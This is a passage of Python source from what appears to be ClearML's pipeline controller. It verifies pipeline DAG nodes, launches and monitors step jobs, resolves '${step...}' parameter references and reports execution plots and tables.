                    'Existing Pipeline found, matching version to: {}'.format(self._version))
            else:
                # if we did not find a matched pipeline version, get the max one and bump the version by 1
                while True:
                    v = self._version.split('.')
                    self._version = '.'.join(v[:-1] + [str(int(v[-1]) + 1)])
                    if self._version not in existing_versions:
                        break
                getLogger('clearml.automation.controller').info(
                    'Existing Pipeline version found, bump new version to: {}'.format(self._version))
    self._task.set_user_properties(version=self._version)
def _get_task_hash(self):
    """
    Compute the content hash of the pipeline Task, excluding the
    'properties/version' parameter so that version bumps do not alter the hash.

    :return: the pipeline Task hash string
    """
    parameters = dict(**(self._task.get_parameters() or {}))
    parameters.pop('properties/version', None)
    # noinspection PyProtectedMember
    return ClearmlJob._create_task_hash(self._task, params_override=parameters)
def _serialize(self):
# type: () -> dict
"""
Store the definition of the pipeline DAG into a dictionary.
This dictionary will be used to store the DAG as a configuration on the Task
:return:
"""
dag = {name: dict((k, v) for k, v in node.__dict__.items()
if k not in ('job', 'name', 'task_factory_func'))
for name, node in list(self._nodes.items())}
return dag
def _deserialize(self, dag_dict):
    # type: (dict) -> ()
    """
    Restore the DAG from a dictionary.
    This will be used to create the DAG from the dict stored on the Task, when running remotely.

    Non-cloned nodes keep their local (in-code) definition and only merge the
    override-able fields; cloned or previously-unknown nodes are rebuilt entirely
    from the stored dictionary.
    :return:
    """
    # if we do not clone the Task, only merge the parts we can override.
    for name in list(self._nodes.keys()):
        if not self._nodes[name].clone_task and name in dag_dict and not dag_dict[name].get('clone_task'):
            for k in ('queue', 'parents', 'timeout', 'parameters', 'configurations', 'task_overrides'):
                # empty/missing values fall back to an empty instance of the attribute's current type
                setattr(self._nodes[name], k, dag_dict[name].get(k) or type(getattr(self._nodes[name], k))())
    # if we do clone the Task deserialize everything, except the function creating
    self._nodes = {
        k: self.Node(name=k, **v)
        if k not in self._nodes or (v.get('base_task_id') and v.get('clone_task'))
        else self._nodes[k]
        for k, v in dag_dict.items()}
def _has_stored_configuration(self):
"""
Return True if we are running remotely and we have stored configuration on the Task
"""
if self._auto_connect_task and self._task and not self._task.running_locally() and self._task.is_main_task():
stored_config = self._task.get_configuration_object(self._config_section)
return bool(stored_config)
return False
def _verify(self):
# type: () -> bool
"""
Verify the DAG, (i.e. no cycles and no missing parents)
On error raise ValueError with verification details
:return: return True iff DAG has no errors
"""
# verify nodes
for node in list(self._nodes.values()):
# raise value error if not verified
self._verify_node(node)
# check the dag itself
if not self._verify_dag():
return False
return True
def _verify_node(self, node):
    # type: (PipelineController.Node) -> bool
    """
    Verify a single pipeline node and normalize its fields.

    Checks that the node has a base Task (or a factory function), an execution
    queue, valid parents, and properly sectioned parameters. Step references found
    inside parameter values (e.g. ``${step1.parameters.Args/param}``) are added as
    implicit parents. Monitoring sections are validated and conformed into pairs.

    :param node: The pipeline node to verify
    :raises ValueError: on any verification error
    :return: Return True iff the specific node is verified
    """
    if not node.base_task_id and not node.task_factory_func:
        raise ValueError("Node '{}', base_task_id is empty".format(node.name))
    if not self._default_execution_queue and not node.queue:
        raise ValueError("Node '{}' missing execution queue, "
                         "no default queue defined and no specific node queue defined".format(node.name))
    task = node.task_factory_func or Task.get_task(task_id=node.base_task_id)
    if not task:
        raise ValueError("Node '{}', base_task_id={} is invalid".format(node.name, node.base_task_id))
    pattern = self._step_ref_pattern
    # verify original node parents
    if node.parents and not all(isinstance(p, str) and p in self._nodes for p in node.parents):
        raise ValueError("Node '{}', parents={} is invalid".format(node.name, node.parents))
    parents = set()
    for k, v in node.parameters.items():
        if isinstance(v, str):
            # collect step references used inside the parameter value
            for g in pattern.findall(v):
                ref_step = self.__verify_step_reference(node, g)
                if ref_step:
                    parents.add(ref_step)
        # verify we have a section name
        if '/' not in k:
            # bug fix: report the offending parameter NAME (k) - the check is on the
            # key, the previous code formatted the value (v) into the message
            raise ValueError(
                "Section name is missing in parameter \"{}\", "
                "parameters should be in the form of "
                "\"`section-name`/parameter\", example: \"Args/param\"".format(k))
    if parents and parents != set(node.parents or []):
        # add implicit parents discovered through step references
        parents = parents - set(node.parents or [])
        getLogger('clearml.automation.controller').info(
            'Node "{}" missing parent reference, adding: {}'.format(node.name, parents))
        node.parents = (node.parents or []) + list(parents)

    # verify and fix monitoring sections:
    def _verify_monitors(monitors, monitor_type, nested_pairs=False):
        """Validate a monitor list and conform every entry into a (source, target) pair."""
        if not monitors:
            return monitors
        if nested_pairs:
            if not all(isinstance(x, (list, tuple)) and x for x in monitors):
                raise ValueError("{} should be a list of tuples, found: {}".format(monitor_type, monitors))
            # convert single pair into a pair of pairs:
            conformed_monitors = [
                pair if isinstance(pair[0], (list, tuple)) else (pair, pair) for pair in monitors
            ]
            # verify pair of pairs
            if not all(isinstance(x[0][0], str) and isinstance(x[0][1], str) and
                       isinstance(x[1][0], str) and isinstance(x[1][1], str) for x in conformed_monitors):
                raise ValueError("{} should be a list of tuples, found: {}".format(monitor_type, monitors))
        else:
            # verify a list of tuples
            if not all(isinstance(x, (list, tuple, str)) and x for x in monitors):
                raise ValueError(
                    "{} should be a list of tuples, found: {}".format(monitor_type, monitors))
            # convert single str into a pair of pairs:
            conformed_monitors = [
                pair if isinstance(pair, (list, tuple)) else (pair, pair) for pair in monitors
            ]
            # verify pair of pairs
            if not all(isinstance(x[0], str) and isinstance(x[1], str) for x in conformed_monitors):
                raise ValueError(
                    "{} should be a list of tuples, found: {}".format(monitor_type, monitors))
        return conformed_monitors

    # verify and fix monitoring sections:
    node.monitor_metrics = _verify_monitors(node.monitor_metrics, 'monitor_metrics', nested_pairs=True)
    node.monitor_artifacts = _verify_monitors(node.monitor_artifacts, 'monitor_artifacts')
    node.monitor_models = _verify_monitors(node.monitor_models, 'monitor_models')
    return True
def _verify_dag(self):
# type: () -> bool
"""
:return: True iff the pipeline dag is fully accessible and contains no cycles
"""
visited = set()
prev_visited = None
while prev_visited != visited:
prev_visited = copy(visited)
for k, node in list(self._nodes.items()):
if k in visited:
continue
if any(p == node.name for p in node.parents or []):
# node cannot have itself as parent
return False
if not all(p in visited for p in node.parents or []):
continue
visited.add(k)
# return False if we did not cover all the nodes
return not bool(set(self._nodes.keys()) - visited)
def _launch_node(self, node):
    # type: (PipelineController.Node) -> ()
    """
    Launch a single node (create and enqueue a ClearmlJob).

    Parses step references in the node parameters, applies task overrides, runs the
    pre-step and created callbacks (either may skip the node), and either enqueues
    the job or marks it executed immediately when a cached result is found.

    :param node: Node to launch
    :return: False if the node already has a job or was executed; otherwise True
        (or the result of job.launch() when the job was actually enqueued)
    """
    # node already has a job or was already executed - nothing to launch
    if node.job or node.executed:
        return False
    # resolve '${step.*}' references in the parameter values
    updated_hyper_parameters = {}
    for k, v in node.parameters.items():
        updated_hyper_parameters[k] = self._parse_step_ref(v)
    task_overrides = self._parse_task_overrides(node.task_overrides) if node.task_overrides else None
    extra_args = dict()
    if self._target_project:
        extra_args['project'] = get_or_create_project(
            session=self._task.session if self._task else Task.default_session,
            project_name=self._target_project)
    skip_node = None
    if self._pre_step_callbacks.get(node.name):
        skip_node = self._pre_step_callbacks[node.name](self, node, updated_hyper_parameters)
    if skip_node is False:
        # pre-step callback requested a skip; no job is created
        node.skip_job = True
        return True
    task_id = node.base_task_id
    disable_clone_task = not node.clone_task
    task_factory_func_task = None
    if node.task_factory_func:
        # create Task from the factory function; it is already fresh, never clone it
        task_factory_func_task = node.task_factory_func(node)
        task_id = task_factory_func_task.id
        disable_clone_task = True
    try:
        node.job = self._clearml_job_class(
            base_task_id=task_id,
            parameter_override=updated_hyper_parameters,
            configuration_overrides=node.configurations,
            tags=['{} {}'.format(self._node_tag_prefix, self._task.id)]
            if self._add_pipeline_tags and self._task else None,
            parent=self._task.id if self._task else None,
            disable_clone_task=disable_clone_task,
            task_overrides=task_overrides,
            allow_caching=node.cache_executed_step,
            **extra_args
        )
    except Exception:
        # job creation failed - mark the whole pipeline as failed and re-raise
        self._pipeline_task_status_failed = True
        raise
    if self._experiment_created_cb:
        skip_node = self._experiment_created_cb(self, node, updated_hyper_parameters)
    if skip_node is False:
        # skipping node
        getLogger('clearml.automation.controller').warning(
            'Skipping node {} on callback request'.format(node))
        # delete the job we just created
        node.job.delete()
        node.skip_job = True
    elif node.job.is_cached_task():
        # cached result found - mark executed without enqueueing
        node.executed = node.job.task_id()
        if task_factory_func_task:
            task_factory_func_task.delete(raise_on_error=False)
        self._running_nodes.append(node.name)
    else:
        self._running_nodes.append(node.name)
        return node.job.launch(queue_name=node.queue or self._default_execution_queue)
    return True
def _update_execution_plot(self):
    # type: () -> ()
    """
    Update sankey diagram of the current pipeline.

    Lays out the DAG in parent-first order, builds the plotly sankey node/link
    description, renders disconnected nodes as a scatter overlay (sankey cannot
    display unlinked nodes), and reports both the flow diagram and a detailed
    per-step table to the pipeline Task.
    """
    if not self._task:
        return
    sankey_node = dict(
        label=[],
        color=[],
        hovertemplate='%{label}<extra></extra>',
        # customdata=[],
        # hovertemplate='%{label}<br />Hyper-Parameters:<br />%{customdata}<extra></extra>',
    )
    sankey_link = dict(
        source=[],
        target=[],
        value=[],
        # hovertemplate='%{target.label}<extra></extra>',
        hovertemplate='<extra></extra>',
    )
    visited = []
    node_params = []
    nodes = list(self._nodes.values())
    # repeated sweep: process only nodes whose parents were already visited, so
    # parent indices are always assigned before their children
    while nodes:
        next_nodes = []
        for node in nodes:
            if not all(p in visited for p in node.parents or []):
                next_nodes.append(node)
                continue
            visited.append(node.name)
            idx = len(visited) - 1
            parents = [visited.index(p) for p in node.parents or []]
            # prefer the job's actual parameter override over the declared parameters
            node_params.append(
                (node.job.task_parameter_override
                 if node.job and node.job.task_parameter_override
                 else node.parameters) or {})
            # sankey_node['label'].append(node.name)
            # sankey_node['customdata'].append(
            #     '<br />'.join('{}: {}'.format(k, v) for k, v in (node.parameters or {}).items()))
            # node label: name + truncated parameter listing (24 chars per value)
            sankey_node['label'].append(
                '{}<br />'.format(node.name) +
                '<br />'.join('{}: {}'.format(k, v if len(str(v)) < 24 else (str(v)[:24]+' ...'))
                              for k, v in (node.parameters or {}).items()))
            sankey_node['color'].append(self._get_node_color(node))
            for p in parents:
                sankey_link['source'].append(p)
                sankey_link['target'].append(idx)
                sankey_link['value'].append(1)
        nodes = next_nodes
    # make sure we have no independent (unconnected) nodes
    single_nodes = []
    for i in [n for n in range(len(visited)) if n not in sankey_link['source'] and n not in sankey_link['target']]:
        single_nodes.append(i)
    # create the sankey graph
    dag_flow = dict(
        link=sankey_link,
        node=sankey_node,
        textfont=dict(color='rgba(0,0,0,0)', size=1),
        type='sankey',
        orientation='h'
    )
    table_values = self._build_table_report(node_params, visited)
    # hack, show single node sankey
    if single_nodes:
        # draw the disconnected nodes as scatter markers
        singles_flow = dict(
            x=list(range(len(single_nodes))), y=[1] * len(single_nodes),
            text=[v for i, v in enumerate(sankey_node['label']) if i in single_nodes],
            mode='markers',
            hovertemplate="%{text}<extra></extra>",
            marker=dict(
                color=[v for i, v in enumerate(sankey_node['color']) if i in single_nodes],
                size=[40] * len(single_nodes),
            ),
            showlegend=False,
            type='scatter',
        )
        # only single nodes
        if len(single_nodes) == len(sankey_node['label']):
            fig = dict(data=[singles_flow], layout={
                'hovermode': 'closest', 'xaxis': {'visible': False}, 'yaxis': {'visible': False}})
        else:
            # split the canvas: sankey on top, scatter strip at the bottom
            dag_flow['domain'] = {'x': [0.0, 1.0], 'y': [0.2, 1.0]}
            fig = dict(data=[dag_flow, singles_flow],
                       layout={'autosize': True,
                               'hovermode': 'closest',
                               'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'visible': False},
                               'yaxis': {'anchor': 'x', 'domain': [0.0, 0.15], 'visible': False}
                               })
    else:
        # create the sankey plot
        fig = dict(data=[dag_flow], layout={'xaxis': {'visible': False}, 'yaxis': {'visible': False}})
    # report DAG
    self._task.get_logger().report_plotly(
        title=self._report_plot_execution_flow['title'],
        series=self._report_plot_execution_flow['series'],
        iteration=0, figure=fig)
    # report detailed table
    self._task.get_logger().report_table(
        title=self._report_plot_execution_details['title'],
        series=self._report_plot_execution_details['series'],
        iteration=0, table_plot=table_values)
def _build_table_report(self, node_params, visited):
    # type: (List, List) -> List[List]
    """
    Create the detailed table report on all the jobs in the pipeline.

    :param node_params: list of node parameters (same order as ``visited``)
    :param visited: list of node names
    :return: Table as List of List of strings (cell)
    """
    # build a web-link template with '{project}'/'{task}' placeholders per row
    task_link_template = self._task.get_output_log_web_page() \
        .replace('/{}/'.format(self._task.project), '/{project}/') \
        .replace('/{}/'.format(self._task.id), '/{task}/')
    table_values = [["Pipeline Step", "Task ID", "Task Name", "Status", "Parameters"]]
    for name, param in zip(visited, node_params):
        param_str = str(param) if param else ''
        if len(param_str) > 3:
            # remove {} from string
            param_str = param_str[1:-1]
        step_name = name
        if self._nodes[name].base_task_id:
            # append an html link to the step's base task
            step_name += '\n[<a href="{}"> {} </a>]'.format(
                task_link_template.format(project='*', task=self._nodes[name].base_task_id), 'base task')
        table_values.append(
            [step_name,
             self.__create_task_link(self._nodes[name], task_link_template),
             self._nodes[name].job.task.name if self._nodes[name].job else '',
             self.__get_node_status(self._nodes[name]),
             param_str]
        )
    return table_values
@staticmethod
def _get_node_color(node):
# type (self.Mode) -> str
"""
Return the node color based on the node/job state
:param node: A node in the pipeline
:return: string representing the color of the node (e.g. "red", "green", etc)
"""
if not node:
return ""
if node.executed is not None:
if node.job and node.job.is_failed():
return "red" # failed job
elif node.job and node.job.is_cached_task():
return "darkslateblue"
elif not node.job or node.job.is_completed():
return "blue" # completed job
else:
return "royalblue" # aborted job
elif node.job:
if node.job.is_pending():
return "#bdf5bd" # lightgreen, pending in queue
elif node.job.is_completed():
return "blue" # completed job
elif node.job.is_failed():
return "red" # failed job
elif node.job.is_stopped():
return "royalblue" # aborted job
else:
return "green" # running job
elif node.skip_job:
return "gray" # skipped job
else:
return "lightsteelblue" # pending job
def _force_task_configuration_update(self):
pipeline_dag = self._serialize()
if self._task:
# noinspection PyProtectedMember
self._task._set_configuration(
name=self._config_section, config_type='dictionary',
config_text=json.dumps(pipeline_dag, indent=2))
def _daemon(self):
    # type: () -> ()
    """
    The main pipeline execution loop. This loop is executed on its own dedicated thread.

    Each iteration: collect stopped/timed-out jobs, fire completion callbacks,
    launch every node whose parents have all executed, and refresh the pipeline
    plot and stored configuration. The loop exits when the stop event is set,
    the pipeline time limit is exceeded, a failing step aborts the pipeline,
    or there are no more nodes to launch and none still running.
    :return:
    """
    pooling_counter = 0
    launched_nodes = set()
    last_monitor_report = last_plot_report = time()
    while self._stop_event:
        # stop request (first iteration uses a very short wait so startup is responsive)
        if self._stop_event.wait(self._pool_frequency if pooling_counter else 0.01):
            break

        pooling_counter += 1

        # check the pipeline time limit
        if self._pipeline_time_limit and (time() - self._start_time) > self._pipeline_time_limit:
            break

        # check the state of all current jobs
        # if no a job ended, continue
        completed_jobs = []
        force_execution_plot_update = False
        nodes_failed_stop_pipeline = []
        for j in self._running_nodes:
            node = self._nodes[j]
            if not node.job:
                continue
            if node.job.is_stopped():
                completed_jobs.append(j)
                node_failed = node.job.is_failed()
                # executed holds the task id on success, False on failure
                node.executed = node.job.task_id() if not node_failed else False
                if j in launched_nodes:
                    launched_nodes.remove(j)
                # check if we need to stop all running steps
                if node_failed and self._abort_running_steps_on_failure and not node.continue_on_fail:
                    nodes_failed_stop_pipeline.append(node.name)
            elif node.timeout:
                # abort a step that exceeded its per-node timeout (measured from Task start time)
                started = node.job.task.data.started
                if (datetime.now().astimezone(started.tzinfo) - started).total_seconds() > node.timeout:
                    node.job.abort()
                    completed_jobs.append(j)
                    node.executed = node.job.task_id()
            elif j in launched_nodes and node.job.is_running():
                # make sure update the execution graph when the job started running
                # (otherwise it will still be marked queued)
                launched_nodes.remove(j)
                force_execution_plot_update = True

        # update running jobs
        self._running_nodes = [j for j in self._running_nodes if j not in completed_jobs]

        # nothing changed, we can sleep
        if not completed_jobs and self._running_nodes:
            # force updating the pipeline state (plot) at least every 5 min.
            if force_execution_plot_update or time()-last_plot_report > self._update_execution_plot_interval:
                last_plot_report = time()
                last_monitor_report = time()
                self.update_execution_plot()
            elif time()-last_monitor_report > self._monitor_node_interval:
                # between plot refreshes, periodically pull monitored metrics/artifacts/models
                last_monitor_report = time()
                self._scan_monitored_nodes()
            continue

        # callback on completed jobs
        if self._experiment_completed_cb or self._post_step_callbacks:
            for job in completed_jobs:
                job_node = self._nodes.get(job)
                if not job_node:
                    continue
                if self._experiment_completed_cb:
                    self._experiment_completed_cb(self, job_node)
                if self._post_step_callbacks.get(job_node.name):
                    self._post_step_callbacks[job_node.name](self, job_node)

        # check if we need to stop the pipeline, and abort all running steps
        if nodes_failed_stop_pipeline:
            print('Aborting pipeline and stopping all running steps, node {} failed'.format(
                nodes_failed_stop_pipeline))
            break

        # Pull the next jobs in the pipeline, based on the completed list
        next_nodes = []
        for node in list(self._nodes.values()):
            # check if already processed or needs to be skipped
            if node.job or node.executed or node.skip_job:
                continue
            completed_parents = [bool(p in self._nodes and self._nodes[p].executed) for p in node.parents or []]
            if all(completed_parents):
                next_nodes.append(node.name)

        # update the execution graph
        for name in next_nodes:
            if self._launch_node(self._nodes[name]) and not self._nodes[name].skip_job:
                print('Launching step: {}'.format(name))
                print('Parameters:\n{}'.format(
                    self._nodes[name].job.task_parameter_override if self._nodes[name].job
                    else self._nodes[name].parameters))
                print('Configurations:\n{}'.format(self._nodes[name].configurations))
                print('Overrides:\n{}'.format(self._nodes[name].task_overrides))
                launched_nodes.add(name)
                # check if node is cached do not wait for event but run the loop again
                if self._nodes[name].executed:
                    pooling_counter = 0
            else:
                # launch failed (or node marked skipped) - log and move on
                getLogger('clearml.automation.controller').warning(
                    'Skipping launching step \'{}\': {}'.format(name, self._nodes[name]))

        # update current state (in configuration, so that we could later continue an aborted pipeline)
        self._force_task_configuration_update()

        # visualize pipeline state (plot)
        self.update_execution_plot()

        # quit if all pipelines nodes are fully executed.
        if not next_nodes and not self._running_nodes:
            break

    # stop all currently running jobs:
    for node in list(self._nodes.values()):
        if node.executed is False and not node.continue_on_fail:
            # executed is False only when a step failed - mark the whole pipeline failed
            self._pipeline_task_status_failed = True

        if node.job and not node.job.is_stopped():
            node.job.abort()
        elif not node.job and not node.executed:
            # mark Node as skipped if it has no Job object and it is not executed
            node.skip_job = True

    # visualize pipeline state (plot)
    self.update_execution_plot()

    if self._stop_event:
        # noinspection PyBroadException
        try:
            self._stop_event.set()
        except Exception:
            pass
def _parse_step_ref(self, value):
# type: (Any) -> Optional[str]
"""
Return the step reference. For example "${step1.parameters.Args/param}"
:param value: string
:return:
"""
# look for all the step references
pattern = self._step_ref_pattern
updated_value = value
if isinstance(value, str):
for g in pattern.findall(value):
# update with actual value
new_val = self.__parse_step_reference(g)
updated_value = updated_value.replace(g, new_val, 1)
return updated_value
def _parse_task_overrides(self, task_overrides):
# type: (dict) -> dict
"""
Return the step reference. For example "${step1.parameters.Args/param}"
:param task_overrides: string
:return:
"""
updated_overrides = {}
for k, v in task_overrides.items():
updated_overrides[k] = self._parse_step_ref(v)
return updated_overrides
def _verify_node_name(self, name):
# type: (str) -> None
if name in self._nodes:
raise ValueError('Node named \'{}\' already exists in the pipeline dag'.format(name))
if name in self._reserved_pipeline_names:
raise ValueError('Node named \'{}\' is a reserved keyword, use a different name'.format(name))
def _scan_monitored_nodes(self):
# type: () -> None
"""
Scan all nodes and monitor their metrics/artifacts/models
"""
for node in list(self._nodes.values()):
self._monitor_node(node)
def _monitor_node(self, node):
    # type: (PipelineController.Node) -> None
    """
    If Node is running, put the metrics from the node on the pipeline itself.

    Copies the node Task's reported scalars, selected artifacts and output
    models onto the pipeline Task, according to the node's monitor_metrics /
    monitor_artifacts / monitor_models lists. Once the node's job stops, the
    node is marked 'completed' in self._monitored_nodes and never scanned again.
    :param node: Node to test
    """
    if not node:
        return

    # verify we have the node
    if node.name not in self._monitored_nodes:
        self._monitored_nodes[node.name] = {}

    # if we are done with this node, skip it
    if self._monitored_nodes[node.name].get('completed'):
        return

    # locate the Task to read from: prefer the live job Task,
    # fall back to fetching by the stored executed task id
    if node.job and node.job.task:
        task = node.job.task
    elif node.job and node.executed and isinstance(node.executed, str):
        task = Task.get_task(task_id=node.executed)
    else:
        return

    # update the metrics
    if node.monitor_metrics:
        metrics_state = self._monitored_nodes[node.name].get('metrics', {})
        logger = self._task.get_logger()
        scalars = task.get_reported_scalars(x_axis='iter')
        for (s_title, s_series), (t_title, t_series) in node.monitor_metrics:
            values = scalars.get(s_title, {}).get(s_series)
            if values and values.get('x') is not None and values.get('y') is not None:
                x = values['x'][-1]
                y = values['y'][-1]
                last_y = metrics_state.get(s_title, {}).get(s_series)
                # only report when the value increased past what we last reported
                # NOTE(review): monotonic-increase filter - decreasing metrics are not re-reported
                if last_y is None or y > last_y:
                    logger.report_scalar(title=t_title, series=t_series, value=y, iteration=int(x))
                    last_y = y
                if not metrics_state.get(s_title):
                    metrics_state[s_title] = {}
                metrics_state[s_title][s_series] = last_y

        self._monitored_nodes[node.name]['metrics'] = metrics_state

    if node.monitor_artifacts:
        task.reload()
        artifacts = task.data.execution.artifacts
        self._task.reload()
        output_artifacts = []
        for s_artifact, t_artifact in node.monitor_artifacts:
            # find artifact
            for a in artifacts:
                if a.key != s_artifact:
                    continue

                new_a = copy(a)
                new_a.key = t_artifact
                output_artifacts.append(new_a)
                break

        # update artifacts directly on the Task
        if output_artifacts:
            # noinspection PyProtectedMember
            self._task._add_artifacts(output_artifacts)

    if node.monitor_models:
        task.reload()
        output_models = task.data.models.output
        self._task.reload()
        target_models = []
        for s_model, t_model in node.monitor_models:
            # find the requested output model by name
            for a in output_models:
                if a.name != s_model:
                    continue

                new_a = copy(a)
                new_a.name = t_model
                target_models.append(new_a)
                break

        # update models directly on the Task, replacing same-named entries
        if target_models:
            self._task.reload()
            models = self._task.data.models
            keys = [a.name for a in models.output]
            models.output = [a for a in models.output or [] if a.name not in keys] + target_models
            # noinspection PyProtectedMember
            self._task._edit(models=models)

    # update the state (so that we do not scan the node twice)
    if node.job.is_stopped():
        self._monitored_nodes[node.name]['completed'] = True
@classmethod
def _get_pipeline_task(cls):
    # type: () -> Task
    """
    Return the pipeline Task (either the current one, or the parent Task of the currently running Task)
    Raise ValueError if we could not locate the pipeline Task

    :return: Pipeline Task
    :raises ValueError: if no Task is currently running, or neither the current
        Task nor its parent is a pipeline controller Task
    """
    # get main Task.
    task = Task.current_task()
    # fix: Task.current_task() returns None when no Task is running -
    # fail with a clear ValueError instead of an AttributeError below
    if task is None:
        raise ValueError("Could not locate parent Pipeline Task")
    if str(task.task_type) == str(Task.TaskTypes.controller) and cls._tag in task.get_system_tags():
        return task
    # get the parent Task, it should be the pipeline
    if not task.parent:
        raise ValueError("Could not locate parent Pipeline Task")
    parent = Task.get_task(task_id=task.parent)
    if str(parent.task_type) == str(Task.TaskTypes.controller) and cls._tag in parent.get_system_tags():
        return parent
    raise ValueError("Could not locate parent Pipeline Task")
def __verify_step_reference(self, node, step_ref_string):
    # type: (PipelineController.Node, str) -> Optional[str]
    """
    Verify the step reference. For example "${step1.parameters.Args/param}"
    Raise ValueError on misconfiguration

    :param Node node: calling reference node (used for logging)
    :param str step_ref_string: For example "${step1.parameters.Args/param}"
    :return: If step reference is used, return the pipeline step name, otherwise return None
    """
    # strip the surrounding "${...}" and split into dot-separated parts
    parts = step_ref_string[2:-1].split('.')
    v = step_ref_string
    if len(parts) < 2:
        raise ValueError("Node '{}', parameter '{}' is invalid".format(node.name, v))
    prev_step = parts[0]
    input_type = parts[1]
    # check if we reference the pipeline arguments themselves
    if prev_step == self._pipeline_step_ref:
        if input_type not in self._pipeline_args:
            raise ValueError("Node '{}', parameter '{}', step name '{}' is invalid".format(node.name, v, prev_step))
        return None
    if prev_step not in self._nodes:
        raise ValueError("Node '{}', parameter '{}', step name '{}' is invalid".format(node.name, v, prev_step))
    if input_type not in ('artifacts', 'parameters', 'models', 'id'):
        raise ValueError(
            "Node {}, parameter '{}', input type '{}' is invalid".format(node.name, v, input_type))

    # everything except a bare 'id' reference needs at least one more field
    if input_type != 'id' and len(parts) < 3:
        raise ValueError("Node '{}', parameter '{}' is invalid".format(node.name, v))

    # model references must be "<step>.models.<input|output>.<index>.<property>"
    if input_type == 'models':
        try:
            model_type = parts[2].lower()
        except Exception:
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model_type is missing {}".format(
                    node.name, v, input_type, parts))
        if model_type not in ('input', 'output'):
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', "
                "model_type is invalid (input/output) found {}".format(
                    node.name, v, input_type, model_type))

        if len(parts) < 4:
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model index is missing".format(
                    node.name, v, input_type))

        # check casting
        try:
            int(parts[3])
        except Exception:
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model index is missing {}".format(
                    node.name, v, input_type, parts))

        if len(parts) < 5:
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model property is missing".format(
                    node.name, v, input_type))

        # the requested property must exist on the model object
        if not hasattr(BaseModel, parts[4]):
            raise ValueError(
                "Node '{}', parameter '{}', input type '{}', model property is invalid {}".format(
                    node.name, v, input_type, parts[4]))
    return prev_step
def __parse_step_reference(self, step_ref_string):
    """
    return the adjusted value for "${step...}"

    Resolves a reference against either the pipeline arguments
    (``${pipeline.<arg>}``) or a previous step's Task (artifacts, parameters,
    models, id, or a raw Task property).
    :param step_ref_string: reference string of the form ${step_name.type.value}"
    :return: str with value
    """
    # strip the surrounding "${...}" and split into dot-separated parts
    parts = step_ref_string[2:-1].split('.')
    if len(parts) < 2:
        raise ValueError("Could not parse reference '{}'".format(step_ref_string))
    prev_step = parts[0]
    input_type = parts[1].lower()

    # check if we reference the pipeline arguments themselves
    if prev_step == self._pipeline_step_ref:
        if parts[1] not in self._pipeline_args:
            raise ValueError("Could not parse reference '{}', "
                             "pipeline argument '{}' could not be found".format(step_ref_string, parts[1]))
        return self._pipeline_args[parts[1]]

    # the referenced step must exist and have (or have had) a Task behind it
    if prev_step not in self._nodes or (
            not self._nodes[prev_step].job and
            not self._nodes[prev_step].executed and
            not self._nodes[prev_step].base_task_id
    ):
        raise ValueError("Could not parse reference '{}', step '{}' could not be found".format(
            step_ref_string, prev_step))

    if input_type not in (
            'artifacts', 'parameters', 'models', 'id',
            'script', 'execution', 'container', 'output',
            'comment', 'models', 'tags', 'system_tags', 'project'):
        raise ValueError("Could not parse reference '{}', type '{}' not valid".format(step_ref_string, input_type))
    if input_type != 'id' and len(parts) < 3:
        raise ValueError("Could not parse reference '{}', missing fields in '{}'".format(step_ref_string, parts))

    # resolve the concrete Task behind the referenced step (live job or stored id)
    task = self._nodes[prev_step].job.task if self._nodes[prev_step].job \
        else Task.get_task(task_id=self._nodes[prev_step].executed or self._nodes[prev_step].base_task_id)
    task.reload()
    if input_type == 'artifacts':
        # fix \. to use . in artifacts
        artifact_path = ('.'.join(parts[2:])).replace('\\.', '\\_dot_\\')
        artifact_path = artifact_path.split('.')

        obj = task.artifacts
        # walk the dotted path through dicts/attributes
        for p in artifact_path:
            p = p.replace('\\_dot_\\', '.')
            if isinstance(obj, dict):
                obj = obj.get(p)
            elif hasattr(obj, p):
                obj = getattr(obj, p)
            else:
                raise ValueError("Could not locate artifact {} on previous step {}".format(
                    '.'.join(parts[1:]), prev_step))
        return str(obj)
    elif input_type == 'parameters':
        step_params = task.get_parameters()
        param_name = '.'.join(parts[2:])
        if param_name not in step_params:
            raise ValueError("Could not locate parameter {} on previous step {}".format(
                '.'.join(parts[1:]), prev_step))
        return step_params.get(param_name)
    elif input_type == 'models':
        model_type = parts[2].lower()
        if model_type not in ('input', 'output'):
            raise ValueError("Could not locate model {} on previous step {}".format(
                '.'.join(parts[1:]), prev_step))
        try:
            model_idx = int(parts[3])
            model = task.models[model_type][model_idx]
        except Exception:
            raise ValueError("Could not locate model {} on previous step {}, index {} is invalid".format(
                '.'.join(parts[1:]), prev_step, parts[3]))

        return str(getattr(model, parts[4]))
    elif input_type == 'id':
        return task.id
    elif input_type in (
            'script', 'execution', 'container', 'output',
            'comment', 'models', 'tags', 'system_tags', 'project'):
        # generic Task property access by dotted path
        # noinspection PyProtectedMember
        return task._get_task_property('.'.join(parts[1:]))
    return None
@classmethod
def __get_node_status(cls, a_node):
# type: (PipelineController.Node) -> str
if not a_node:
return "pending"
if a_node.skip_job:
return "skipped"
if a_node.job and a_node.job.is_cached_task():
return "cached"
if a_node.job and a_node.job.task:
# no need to refresh status
return str(a_node.job.task.data.status)
if a_node.executed:
return "executed"
return "pending"
@classmethod
def __create_task_link(cls, a_node, task_link_template):
# type: (PipelineController.Node, str) -> str
if not a_node:
return ''
# create the detailed parameter table
task_id = project_id = None
if a_node.job:
project_id = a_node.job.task.project
task_id = a_node.job.task.id
elif a_node.executed:
task_id = a_node.executed
if cls._task_project_lookup.get(task_id):
project_id = cls._task_project_lookup[task_id]
else:
# noinspection PyBroadException
try:
project_id = Task.get_task(task_id=task_id).project
except Exception:
project_id = '*'
cls._task_project_lookup[task_id] = project_id
if not task_id:
return ''
return '<a href="{}"> {} </a>'.format(task_link_template.format(project=project_id, task=task_id), task_id)
class PipelineDecorator(PipelineController):
# step definitions registered via @PipelineDecorator.component before the
# controller singleton exists; consumed (and cleared) by __init__
_added_decorator = []  # type: List[dict]
# the single active PipelineDecorator instance, set at the end of __init__
_singleton = None  # type: Optional[PipelineDecorator]
# artifact key prefix used to report eagerly-generated steps back to the pipeline
_eager_step_artifact = 'eager_step'
# True when this instance was created for eager (nested) execution
_eager_execution_instance = False
# debug flags: run steps as local subprocesses / as plain function calls
_debug_execute_step_process = False
_debug_execute_step_function = False
# default queue applied to the controller on construction (when set)
_default_execution_queue = None
